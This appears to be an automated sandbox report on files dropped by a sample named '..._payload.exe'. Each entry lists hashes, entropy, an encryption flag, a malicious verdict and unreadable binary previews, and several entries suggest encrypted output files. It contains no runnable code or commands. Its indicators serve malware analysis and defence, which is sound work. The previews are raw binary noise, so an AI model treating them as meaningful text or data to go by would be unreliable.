                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8536958709385845
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MCxvksBZoqRHPZ1rZRCgNRT/jAjnz7bn0iW5fSSYakarC3Qx3bD:LxvzBySPHdRjRT/jAz4iW5fhkaWsLD
                                                                                                MD5:A5BA32F70C4E7F05EAA93A83FCE7908D
                                                                                                SHA1:1899FAFF25046FFEC5DD3473177E4E52D31A0682
                                                                                                SHA-256:1DB881BF46753D21F6E1C4B7C433DD820BCA0016209573BB9430754283ABD8DC
                                                                                                SHA-512:7039525B6787BAE8DA599793AF37D4DFF73AA02D42B29BD9C72F924EE8A0D32BF449BA3FD75670E3BFA25DC14364A033F42E42B2FD819E2DC304121CE8A127EC
                                                                                                Malicious:false
                                                                                                Preview:NIKHQ..4A.......*..NI.t.....?..j..B`g..#v..h...2ka.Er.8.W....../~M....y.j274..v..s.:.....U.....N.:0H..m+..x]u.]..I.L..+...<Y|4.4...uH.#..v..!M..V.....|...5f..1.J..h..J.!.Ys.."p;.T.....9L.r#&.2...)..............QY..............j......T.......h..p^....u..6...X.2?/.*u.k{F.y.o....kY.G.h.h.....|.....p....9..1S...b(.K...`.....9.<...U...s...Hg...u..J.dS=..y8....)Y....L......`.....:E(/.r..9.G.....H.^......"...}...... .......n.'.a.(.3).k@..|.f_.....~sOs..:.ll..../.+j...$....^..V..C.3.?N_@.1'.w(.@...e..MJ..%.N........|.|.q<.d...vP..L.P.2....:...d.kA..rB..2.W[...w..L\....Y..$....\p..v2.....*.x.q....c....K......td.......G.B...~.jj........2..v...H.V....B~..X.;J.^..b.^..$w.l.A...l......0.f/...0.S..^]!.>..Iz.3.....YoG.......\9"...V..).1.$....(!.N.<..Op..Y!.cB.<<.\8.).jg.C..a1.b...L..M....m.j$...8u..6.`i...U...4..}d.w....d...^wy.>...).SV6..V.....,V.].{"..........b..m.:.4=..W..&z.X.@.F..h..i...u%l.(%.#.%....I{..q,.aO..*.[..0..pM.H....w8....y.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1567
                                                                                                Entropy (8bit):7.868964998312823
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cPFKzQZ0uVf8Jz6aGpYr6LmeuPmr8zH6F6vd5GyWASHFoMwyeyO5lOlG0FmfM7ui:CQQgJuaGpYCmskrd5G/ASHaMJrQ0yaLD
                                                                                                MD5:855A490CB3ED3F38B5E404FD63D726ED
                                                                                                SHA1:71955AC3DB0BDAE63607ED8ADA3B127AD3AF5467
                                                                                                SHA-256:6A370338114426BB9040F75EA585DB54E53B8EFF924F9292D1F2A9F09923B33A
                                                                                                SHA-512:CCFE5C906FAB7635B15CAB013228ADFD70E3F5497B9040445E7FBA6FB18FD0F3A61637CF45A1E0259B400FE61F280CE7E35F6A65878FDF51DEE1D6ABD52FA94F
                                                                                                Malicious:false
                                                                                                Preview:%!Ado.\...*^Sd~..?Z.;..`...f3,....u.Om+..i..FRa.E%e v..E....Y.J..J...].+.92......3...44.p...."...dJ._.(G....4....`..r`_. .[u1...l..\.......c...s...!..5../#zR.o.!...&...@.dz.$.............e..uU.M...[E.6qA...2.(..F..c..2u.9x2.i.C{.Y$)$b.U|.......9j.k...."..A......./..$.-w4X<..*.*.......3........n..&A(..4;..Y..dI.M..UD.&..+..fW.5.<._....t>W...i..0.%q.C.,a>..;.......-.*....L7_A..<.E..(...H...r...._h..}..>..\...?j...&.....N.<.MA.b.!b..)Lr...x.kd.K.!.X.........:V...96.d...E......1..]..b.&aIB...t.D....F.=.V.].'.\.&z..Z...Ou$..{.O.V.H..)......N=.....iE{./B@.{W/.....R0.O().:..1^.A..g#./y...T...z.....N.3Wz.8.[h?=o..7..-,6S.;.....}.q..7t...a.s.........kPq.kg.D..(#Ug.F.zS*..D...).........T.7.#...u.R.....).X.2P..O..R...>.#c..O.hMe.....qx...x#.wj7P...Se..9./..@t..qn@..M.&...W.a.x..l..2m....B..ef. .h..q.N.F.P;......W.^T(....h.Q.....Oh..B.H..O.ZM..w....+.2H.#:.(...=....R.E'.,..]..@..Ui..!&?z......f)u+..J....M.Q.jp!...=P>(Z^f..}...nlAU.k.....4..^....jA;mfA.C.TN.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):185433
                                                                                                Entropy (8bit):7.876328644033132
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:Xf0/Ob0gHbjbX6EmRkeA+ruR0OBQBdCCYNY6maR8XE07ZmandGCyN2mM7IgOP0g4:P0oXz6EmRkeAX1BQqNYnXE07ZmandGCD
                                                                                                MD5:74E18E239D0308B92709F4166DC6A70D
                                                                                                SHA1:20E417394D132F1D4530A5CEBE83DFCC855A8AB5
                                                                                                SHA-256:D2DEA60C5C3F34687A24ACA612D9692E6B8235590D3C6304B223D9BE87AF58FB
                                                                                                SHA-512:3BFCC497E7CBEA1223CD74F9BB848F6187016E8C59A33901E5928A6DCFDF50A5ECC0FA542D07C5095B4FA67EBDEF220E78F42477B9211C8029ABF3B0A1BABF79
                                                                                                Malicious:false
                                                                                                Preview:%!AdoS.......I.fC.+;zj..+2m>5.#.0..5...a.z.5o....Mtd...../{..?..A..."n{.nj.b.=...w..KCf........6......d,7.O.J..z4..y^..h.o.f....;.]..?.cm....4.../....XnQ..gcw.0(Q.x.....&....>...,..O..&........!gY.&.b.;.p..MS...LT....._.. ...vQz.Ub"..EHF..Em-....#.L........n?..h.z.&@?.....A.0.-.C..B...F0.g,.a..T:~.iB.{.T.N...zAf$...h.....*..Q.-J3v.. ..e.V.I`)YXB.....$...@.2X......J.R....fx....Qj.......n..;.x[>.......8.0.U.fM..v...@..`...$.$....K....uz...V.s...=Fr....Z.&PI...W..k"..$|........^.L.q..B(...8i.............p..I.B..D......zSM......N[...T...9...9.........$.^.U.7..d4.r..G.J.g.b}.-.:B....l.V2..I.:....J....#.g0t.....l..Ae...5..u.....P..C,].uw..........+..*9.K!<..Rr.>.s......FJ.)4...+b/.B.l_.O...a.O....5........Mf...........v....vE....4.g152M......rP....H..:....3...,..,.~..)/.~X.%.d/.T.K..U.p...@x.....W^.oL.c....:..s...lH"2u.*p(N.L....p!T...,\t!5[...eAW..X>q2.;.K.A..Z.c..V.....UU..j.?5..82..x.K..4$.v$.8.Z.k..q/T....Fl..-.U~4..........} .4.M.C..=.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):243530
                                                                                                Entropy (8bit):6.818306248711292
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:xZFSsxk5uqaIP+qRNsim9aKWZbOV+zy9OgREdIe3NsicAR293cnuxOolNlno:xvxdfTe9nt699/RE9CVrcOno
                                                                                                MD5:80FE24F7F9922C06B98C05782CB40705
                                                                                                SHA1:F9BF2FF62C542ACE6218FA1CCA5FEFB892F1A978
                                                                                                SHA-256:B5E3CFF33BD9B7B0CF6DA7C8C52C41FB65765D00D8B69FD73C38D84DF70F1565
                                                                                                SHA-512:E2791F098BE8217899C410FC9E86453D26FAB4125C9245C39B57C58F449E463DF5CA9A0B039B0E02F820B4738E3BB08B8235D40720626C0CA4451B7001EBFF0A
                                                                                                Malicious:false
                                                                                                Preview:Adobe.8u...u.1........R.#....f.). _gk..]$......2.8......R.....dKnM.zG..A.|x.@%.RSc.ZI..... ..y..-.&.<...WC.I....3.......!.....+yl.D.... .:..<..X....T..F.M..ER.X.b.Na.0T\..5`3}N.A..Z_.....c.I.3......N....I..A.a..^s.M& ...H<..9!?...xac...>T^H.....Z.f.<s.]6".....J..._...R.h.J=........`J...a.e.CH.y....X }-.....![...Z.|$....,E....\m.B.~Z8....:.....9EZ.k..]..E...Q..8C..@...7..<k.1..>+..(...&..?.....Oe...?M.&hBq....@......7l.*....`.......6]..1.8..H8.'..&.p3...M.5S.2.*}.z...x..E....).6:*i..7M...@@I.Q.3....u......\.R..~.....Q.H.|.,...K....<....L,.4#.6..|.~..D..i-~...O....c..=...?e..#.?@.,M....d~q~...K.....HG..dk.a.Mj.Ym.nQA...O{.Q...d)..8.... .#/o.\-l>#..Y4.....N.K.}.....L....x....*..k0q....h\.....d.s....v.h(l*..~..q.?.k\3.{.)Y..y...$......6...a....-|.:.'\..c..J..x..|a.....B...j....@.7V...pJ9\..rc\..Y..i.j.w...]v`u.&.-.I ].'...0cbP.T.u7>.........2.]..io......2..7H....2......!.....W..Y<.9....g..0....+.Cd98].@.~..t..8.T,.n8....d6.....M.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):67060
                                                                                                Entropy (8bit):7.997468322608659
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:HCp3ooP0/069DsAGy5/8YhIHf5sN3zQoLS48sSQJBwGQvyT1/E:i2JsAGy5/5eR5OS4QQUGsANE
                                                                                                MD5:252A11EE9EA2A396FBA6F40D0B9FBD00
                                                                                                SHA1:B83A83D2661625D935A426B2DDDC7B18E48E871A
                                                                                                SHA-256:9A27C335EE990461C0AE91BFB6170CB5699DA151EF9A648B5F52C770C4B702F6
                                                                                                SHA-512:2BEB8EB7CB199F8D9BB73833C0CE6C34A916A6E31E75739942A3E46649891B098B342366EC0691F682F07A19133A27A1CC5D53C57E3B1F30FE00FDBA78115D5D
                                                                                                Malicious:true
                                                                                                Preview:4.397....|mZ.vv...6Y.....|o...D@.+....8....,....b.V...=...q...y.'v....y...u.:...l]@g...3..Wy3.8....%].".....bDSK._..J.v5bM.'..........R.D..X.....-.....7y..../....5R...-...]y...../..m....`|.G.fQ'1.#.^3....t.Q..w.Tft.n.:E>.*......J....hB..........=..f.w.k..K,..}....9..q(.~.e..7>c......Lq2.9.rB.G.B..k.n.wp....DT.5?3$H...mI.r..i.......Y...ZYDe.,..\.]..._......_.....7"se.1...^:.d../8P.E.......O..pm..z...5..B:.o...C.l.......5....'....6..5.t..M..v.R.o_t4.Sl...T....Q..4\g..z..H.4"-w4../.?.2.;U3.U.h.8W_..G...^.t.1.K..........w..s....,zRz..)T.<...B......1....R&..*.m.....i...Y.l.^..(...yo..$p......_...V3..3.....?L...5........R....r...^..'O..I..`._.xT.v....Z/$....R...cS...T/X..l.SgH.N.q...!.O....aV...O...TP.....O@.L...#NAK...A...(.0._^Sd..KaJ!..#H.....9..l...O.SS....s/;......:..`.".M..JT sw......_....&...W.=.].>p..{c.aB...n..9|..._...Q .}.]..J..._.5d..Zv.t.5H8..........C2..w>ab....... s..........$ }b...Z$..aX..f*./lH.L,...0.t..$..=xk..mpx..Y3.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):932
                                                                                                Entropy (8bit):7.773179099902058
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qR6PklXMEG/SWfmRe7rXmJJlusU+KonOAx3bD:qhpME8ZmS+FnNLD
                                                                                                MD5:35931F69155BC0B38D5EA0DB67EFD033
                                                                                                SHA1:2B7ED48ACF2AC1502B1C39AEA937C87D9731277D
                                                                                                SHA-256:9B546DC69DCC254221D82977781C73ED1822504FDB5A7CCA847FF6221D3C748A
                                                                                                SHA-512:9265A8C62E14D34369C5B0B99243BD021EE805A9F644BDED24F5DA5C8534AE1C5318D912F22A4BA121ABBCF973AA59E79E3E4E4155DE5EAA2D7527820FBD50C1
                                                                                                Malicious:false
                                                                                                Preview:CPSA.......k......&.*.1......K6]._.C.<[w!....k."do...D...fY.k....u.h.j.O5.X/X..z.C.1.B......r%...m.KL.......t..5v}....Oqj.f.+>...:.....xz.....W...,..F.E..".%U...O...`...6*....P..'s.{...ma3.7Z...4.]..._.n...m[..H.j%V..n..?~8*...&.n.1...9. O~.FyW.....(..dR'-.O....."!....-..*\z....Yyz`f..~~.-{?.a.o..&.BA.}.,2yw...z.>.vx.m..I..=..QZtJ..n......&)C..VO^`4....W...K>.jg5...9U..j..M"H\..>..3L.....f..9..1.L...3..?D.~.....q........./....c.X5pU$a..%{...lU....6..b.P.1Dc.D.Qq82. .......~..S..\D5...C^.*4K.x.%..x...MM...8i........E.3.(.1..|t..$.PnY.4O.n#AeZh....X.O...1iK..]...>D.w.b....@.....n....31.rixl...&........<.... ...E..C...<V..O*.?.d.oy3...$..=.`.........?.+.....m.......\..t..R.......&....g....0.....3..:N.AX..;/.......d..J.6.[..6.9.$.n...M.^CFH.?P.(....D.'s..}.......).k2...]...bP........)N...b(.....6......o.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.975426297507727
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:adGgbveV+wBVHN5ZKr5pnCxPwVx2mQHtqU1ovCf+NDOSAL:AbveVRB5ZurCxKYmFU1MCf+9OSAL
                                                                                                MD5:95D17F3A40141B79D415B33671FB1425
                                                                                                SHA1:C9CD7E4ED8B1C71B5AD20C06BD0F8AF006913B47
                                                                                                SHA-256:F0D63EFA0E62733674F60E82EC87BDEED1FDABFDE23B7AEC8F77BF00F7985C72
                                                                                                SHA-512:12D29FB204240EE6F22D5217B9F6554923CC0184DB051FF2B330A98C16D22460529CFCBF8CD3DFEC59AE7CC208414C6C4E1938541121EE9D04274D5F1BDD6684
                                                                                                Malicious:false
                                                                                                Preview:.M.#.1...E.k(0Q.......R.AjS..p.a/..\.&.,3.>d.$..=..I*...dsm.........~.@.L..T.{7.N...".....N..I^.|.|L.~r......A.r......^.. s........Hp.....N.CQ}.x.._~..g.F:+(......p.*..FA.....Z......%.yn.>.....Y>!..aTe...F.....~.u....K..M.t-8...\..........^]..yl.y..{.:.!.).@)...=....H....-w(8.R8].|..\LH.....W....u]...J..~.../.!../....'9.C.k8...8.......":...)Ly...v.g..1..n...9(.........M;.. .T2.....%.?N.$.5.V.u.fwq._.1..!Z."}.U..._.......2.!....R7.I?...X...#:_a.4...;.....Gg..9H%...eh\.,"........#:.t"....~...E.,.":Uh..4u}(`t...a..`.....jm..qQ..&s...0...7...@Rq.Z..nn.t.....'S../.cw..5/.MO..$i..}.+.==v-.K.....mf|...D..N..EZ.......&..y.0C..R_d+..z......@.\."a......Rj...L..t......(...s.....U.C]&..S.E..c..`.0.j;..".x.......|...^..*PI.C.._.C.rw...M.:w.1x.F..r.p.)6.z..c..f..v]....@...j1[.....E.a.N.......}Nd.....i.h..>..[.1.C...S....w..'#..)...28.S...^9B...*R.....6..K.@.9.Z/B ...m.l.....&ko,A...N.@7I.m.'...Ap.....\....K....1-....b..!.....KO......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3146062
                                                                                                Entropy (8bit):1.7332511945136846
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:h38Yd8jdA5erv3WEOKo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcbBVKlPK3:p8Y2j+5eDgKfCdYS6
                                                                                                MD5:CDC0AA27DA338325D1F94BBAE28EA653
                                                                                                SHA1:5535FEA41EFB43EB198159D495F926C251843233
                                                                                                SHA-256:12ED385EB124C4825E520D6B55E1FE1B0792DE70B4195C2A8955870F58F5106C
                                                                                                SHA-512:4777FE9C02EEE76DF69545E71EC2F4332A12998498D22CB5284962C35D4DCFEEABB8F877F40C793324148F17CD47680E7CB47A17E3847981253D568502DE1624
                                                                                                Malicious:false
                                                                                                Preview:...?..)g..e..Gf...P..A...pCWi".......I.m..a...&..............G.p...mi.?./..V.....:..... .Q...M.j.....A...|.1..../i...2......T*@'W.(..?{.[V....N.W....Y2v<.].........HVf<.$S.^..^....%.~.q..G/..Xs-.UkH..V..E>...0.:h....L.&z..|..@i.9=..{.}]N..}...oU.2....J.....zu.$..2...u...g.3......Fb^(.....f.._O...^O~N.....N...[>.yD.=......md....?<./. '.?".OX..K.4...aM.C..UK>\>..67...6K...en..T..b.r........%._....S........ud.5L.._.!....|....8....8..-....s|....}.CR.....r2s<.!.o..Y..i..kwMq...<.W...R....n..+.....*..(N....V..ss..i........v...%W.~.F!8..r9..%..(OV1...qH........Y.z....1..6..%.c.vv./..w..-4s...*.>.L.H'h.C.2_*A.x~3.M)3..s...1..&.....8.&..n....sC.I...."O...i....z.kV..]...:...._.89..n...n....oB.p.....a.....|Tf....ed...K.W...b.D.=..}#.jy.<s....s.....i7q......Qp%.... ..._.asfm..d:r..&s.e..._A.^?.>....hY.Q.%&Q)....-.:.4.m........2^Y....P..)e..B.ZS.I\r.....z.>m..d..g.3...g..)0.s.....,......N..4....v.Zh.%6....y..5K">.....[G.b...Qb".(.l>-.|....:}.I.&5...ir....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3146062
                                                                                                Entropy (8bit):0.670710325971357
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:JOTLd6C0neEa5Zw+Rb0s9uV7M6ABi1pm4rFcp:Jcdkyu9yuu6Ki1pXrqp
                                                                                                MD5:9AFFFE8F07E8830D826E3B2122F32AB2
                                                                                                SHA1:81DC30E0D00368536F8DC3A03277351D6DD6C795
                                                                                                SHA-256:9BD0C59BD3909DA38D17CD1E3A91F538025FDBA2469E0AFDBA7E11AAE52721D8
                                                                                                SHA-512:377F1BD0AAF751B9978508D378B6740CA2FB4F4D043C88DD432F27842485DFA0ABEAF685F63ACDF34EF403C5AA882F0124ABF5F0CD951459684BFE0979750B13
                                                                                                Malicious:false
                                                                                                Preview:.......f...5.6..i....M ..XB3...aP..M...6.. m+'..I...-Rx......j.~.k.......4bpG$94'.....R..c...s.......0....R5...G.5..3..~....Bq...~a..p.q........{/.X$..-.C.K..FI..W.8^..D.+...q.<..Y.1w."?%..R.....c.1.|.u.6.....*8..f0........{..w..J[...B|.r4.8X.t.@...w./..8...k..bM`qK.e.vV.g.."..Ez.42Q.]..<..U...va.J7...~.._B...9...%U=.o..la.(.@.pTK.Y$2.. 9@.{.g......._M....:.I!.....F"../...}M5.t;N.J8".T...PL.o.Z...<5..._.?.r.f.9e......F..|Y/...h.2cz..........X..}ZY.5I..r;..Q...`.y.Q.. ..U.5...1.F..?8..D..ILR.W...Z.7......q.....K.<eB.f..Pj...p..t.lq7`E.Z-=....}......1...P.u.Ny.n.M..u..Nd..Y....s&.y."....DP.....[.'D...0G...FW.J..]{>..Jxb#i.M..'_.e]......r.{.5:....;~..[<.....!......4~..X.7p. .VA...........i..3/...Ry..m.9E.<.\.l.@.a..S2U>..;.U......<.d.$.........+..X..G..J.m.".u..M.2p_;%.to\..y:...%(....I...Qy$`.K..,D&a2.K.q....brZ..~%Nl4p.:G..2..;...4/d......+.{...1o;...=D.~:](N=m...%...r.7..7`.qm%.zMc).9.........}V...aY85..!..$.9da?...So.....A_.F....?.[|..%=.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3146062
                                                                                                Entropy (8bit):0.6706100008616789
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:l0DeTlNlWYVtPZ4jNmqtSenhCZSRvuVnVYWbtvZc56fFwo/XnJSv:l0DVYzR4M2SehlRWc2t2cDw
                                                                                                MD5:62FA29D2A6964647C52C3963DDFEAFF3
                                                                                                SHA1:B32E5D25D2637A074C59F255F76D1726C399B453
                                                                                                SHA-256:49A1C09E3999FFF717FD9EDCAD65AFCED2DD903391C23A9A082DF94E00C81CB9
                                                                                                SHA-512:40315C41C55094590D5002772923B7239C764219F80354E247222AA99AF435BF3AA7B3B1B966E9EEEE9ED95A8ED295AFB531FC119E25494A13CEF6B4AF4A47CE
                                                                                                Malicious:false
                                                                                                Preview:.....;'.^ez......y9...,TB..v...}......-S..1..S.(.[b..>..y^.U...M...L.i,g..z...4..I.%T.F........!..Y..c....h....)..@.\Mq..W.\.D...Z.3k...Y?e..L..........^.ua.6.i.f.P...s..4.._."MnA.JP....#f.ey.+.y..V\.y.y.Z(O..........D......`Rr...x%.~e.../m......AM...`e..:vy..?.0....yH..2F.c.Q...u....KC.l.......>V....K.0^z:u..EG...,..:."...9..k...5...O.k...-Yy^.?hU.M+.W....{.Xk .l.....W.%Cg..iu..Gp..:.C.J.^..s..9Dk!......xp.....4e.z4....~...tL<...=$.......s.....:.........5...'...}...}L....cM.yk.......H"..0...l~|^.s.}......3SDr.se....`..Q..G..t.by.p...sPA.NM.(.Kpf!........q.%..qo..*...f.&..J#.~..W..[k0J..~gA*..zpU7O.9.qDN...tPgr.F....../..z.lj....W..1..b.f%....d...U.......~.ML.B...._pJ$h..F.....)}q.}.!.U........0`/#...."...~.f...^..9I.*.Od......>n....^YL...!.@..|.....^P{..r[.....f.5.......gX.&....,....#.X.X.Rg.O.@.........j.)h..!...*...L7g.+8]6.0@..-....Z..c.0Z)=...{.W6...fE..e`G..W.".j1".@...TZrPR......-.bn..5..`bNK..L.U...../dD.gN.a.W}.S.U..x])...x.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3146062
                                                                                                Entropy (8bit):0.6706726943541486
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:WYT6Y4/YwAddgoiVIzV0paxOF8oqU2YiZ8d4bIrI/:WFFFAduXVi0acG1Z8d4b/
                                                                                                MD5:96B0EFF6802FCA439457772E6C276A4F
                                                                                                SHA1:8BC65A6E3C7E4A6C649071D5B96DF40746803701
                                                                                                SHA-256:E59C7774856A821E0B082AEEF089A6F48F1FA7DBB224A0E8F3F76B25C5C3ABB1
                                                                                                SHA-512:A555D934E0DDF9DC19A9CEEF22A00DBC52264A7F3A1BAAD40300E31D8394B9BCD485AFF5A7B6BA3326E3DC1F01D7BEDF693E8036DF332D3571B3FE478F66D903
                                                                                                Malicious:false
                                                                                                Preview:..............h...pr......a.7e.+.b..r..Pa.n.. }..;".8......U:.......@...(.........?d!mC.._9Nh..#_r...,..w#...b...f.R...A.{.#0........1...e../.p.M.miaD......7.8.n...Nz.....7&Y...4......%.ZP.9}p.Og.p..,...!..............`_.l.....Q->.0.e.j({.E..`8..`w.H..............k.K.&=.`{7.N.r..p<..n.0B.p:.%$..N..`.0..'.Q2...........5..l...._Y.`...S......x8\..H....&.7..6...P;.......s...C...NbK.:.mo....^Yt)..pMD..3`<wA.}..Z...q...:+.!?.m..r'I?$..8.P.........E!.Ql...(...O...0..?.5.cbr..hCN...p_.|.T.8...b.....m...y...;....\W...Dz-.....4.7$..n.."..Q.-.....4.,!*%..p.....Y.g.l6..2...{.b.Jn.....W..pl.#.2..._.)..O.bb..C.f.%.;......Q3b~.6M..t(l=..^LZd.ps....\S.lg9.o.!p....:7..o....6.,x....).....Tk-\..q...Q...Y`..Cu......?.=.-......,..TW.,.=?L...d....e:\.GxQ..pU.....U/..z1.......VG.7.[.x....}....j.a.x".N.*~.4.9)..Q..f...AOh4.Y..Z.n...)`..x.7&.CN.km..'....4...k....A9.X.m.[..q..N.....3..Q.X.W.+.}T.ee. ....`1.X.%..(). >Z.)...........o..*U...A.-..<.So..iV.g$..\
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.9861150926022795
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:7DX0frrQhHYoiMETu+MgafV6f7MCbg/7O7Rlcw6abxntrM4:MfnQ8u+a9WMig/7olccFlM4
                                                                                                MD5:79CFE4FE592A9322F9F72D9183359ECC
                                                                                                SHA1:2D00FBA372FA51EA03EDBF45E2E28B92DB53D7B4
                                                                                                SHA-256:6F4835CCF019F338FDC8D9C1973DC7179F00B47AB9E7CBEC66F5E3CF5FD5FFC7
                                                                                                SHA-512:A34B94A50298384428A81E5B747A872828AAFDFF75D5DEB2293B03D903D7233F6FBFF2BAD6FB8E19DCE22D54006DE6570718438DAA53634C654C711719818F08
                                                                                                Malicious:false
                                                                                                Preview:.....z..{.D..O.,.&..^t..5r.}Kb.]...z7....Aj/".<}<y.l..1....22...t....=......LU..5lX.6.T@....yj.N...........=/+....+o...i&....9.B.8..a............7=.."...E....0.6.8.B.h..8.vo..l..q;.`d......e.p....;...J;...y%...@.^..).N...W...m..?.3......i.o..s.....?...!wt?...Ee|....q...<.$\../K..T9..[..-..(.z.~J......._s...r..rQ......].E.n1..8.<.m..{B.....$..@....!...(3F(....tN...t#$M.ipu3_..y....@.&Y.....O.>.X...r.J..M...Y...H...]...r..Z!F....}p4.QO..V.C.R..`{..y.,Z.m.}...@q}>DhBCZ...H..ql.%..[.u.....K,..c..:..i....V0/......q....\M..K.......X......i...n.b.>..LN.3...9e+"..^..WV...(3.3.~.4...3"..J.......$..8.an..}...e$....&I.1{..6.<.F.A1.5.L.E..4.u>......1.A....W6.......|#@.^3./../........DK........0.O....I....m....B..'i.$...I.4......u.m.=r.K..v..m..Q...o.. .~X...BP.d....mh(.^....h.g....dA...O}.oH.2M..J.&........s.~g_.]Z1?J./..j...v.a>..r,.Iy..&.?...tK.T.Yw1..Z#..m...'s*o..y.mL..[A..........~.....DR.o!.....x..'.aUY?.@.t.d.-EF..HL.`.3.)iz.T..\L..&.2.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5767502
                                                                                                Entropy (8bit):0.7569376489529565
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:b3F5vMRV+d229WC+oKSa+d+gOrOuWxWk3m+cun4CfYjUfSUXivOYRqi/vUN+rSbe:b3URVlOvR3b01
                                                                                                MD5:042617F3C3F40798D6CEED5661734E33
                                                                                                SHA1:A99EAC93B11ECEEE9BFB8B17FB7C7AB6E063843A
                                                                                                SHA-256:A7F5352B147FDA87D50F3C34D9F0F600E467022BA959E91067E7463D6404BB5A
                                                                                                SHA-512:D37DC65FEBF06DF5D81C5E0743399E550726515C41BB0BC7050BD3956DF933C88F1E54288A6E5B49340CD99B330D58A34B6ECC170E2D9176316594FE1D6407DD
                                                                                                Malicious:false
                                                                                                Preview:....)\.R........U.n..?.......^...!.0.z.C].._...6.....NE.t.x..+..Y~.zAn.4..\..v...'.k._....[3.j.....^...75..2.'..:...tU.+..~...P.q.6V..e...pL(.I.?n..Io..@m..B.Fy.R'.V.2.D\..Ss..h.Q..V.*PW..(..`....I.f.C..<..^...<]...<.,_E....c....OS....(&..w.[..h.....i.8N....1q.74T...W2.d..MC.........M..qs...J.=S.X.0_vv.Q.io@......,.b..TVA...(...........9...'...s.:Rq.._..0...zu..#t...M..z+..I.S y).=.....5..K.tWr}........F..$....`.+/.y.&.Z.....7..+h....... ....TJ6.2t.N6...S+p.i....,..2R.5y.}...3..q.!....xr.`....[...J!''.B.$..3..m'.x.B......E.Ta.Y.S.[. .z7vPrU.O/..ZCs.&t..L.0.3.2..T.j.F."?e......x......w....)..x...v...Y^.%..w....U0.7<I.4...;..}.wse.H.....h(....X..%}.E....&`.$*5j_D..?.... .!.o!c.....t.....s....w..@.e..(.eG.4`.q2...R$....>.&.8.HC..JZ./.'..Q.YJ..3.T..........,...}..A{....,C.......K...y...'(.3..h]....[{...q..X.6.-.."[...N0..$.......Bc...3)..0L ....)......mD.u..Q....BBX.k).B.P.d.t....F..a..n.\.R.K'A..w..I..^^.D.*7..J.........B.....I.R6.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):49486
                                                                                                Entropy (8bit):7.996462066702139
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:2zPfoXll0yvDBVqKnEyd8Bs2ZdeQdmt1Gx4Sh:2zPQXlrX3EyKs2reQdu1GaM
                                                                                                MD5:DB7394D1EA0BEDD10A149488EFDB094C
                                                                                                SHA1:22BAC1DEC423A19F2C126DFB841C0A95123A5F41
                                                                                                SHA-256:BD52DF52B6AEA23A914409F37A09327B22E26C271FF1B95F638BE0D827B8DFB5
                                                                                                SHA-512:CB761184289FE023469C06069476EE5AA62D51F8B24855BFB95D14FC97BDFFBDE719E7E6FAC389AE790957A88F4FB3281B9ED6CB97182429142475A6EC4C13E8
                                                                                                Malicious:true
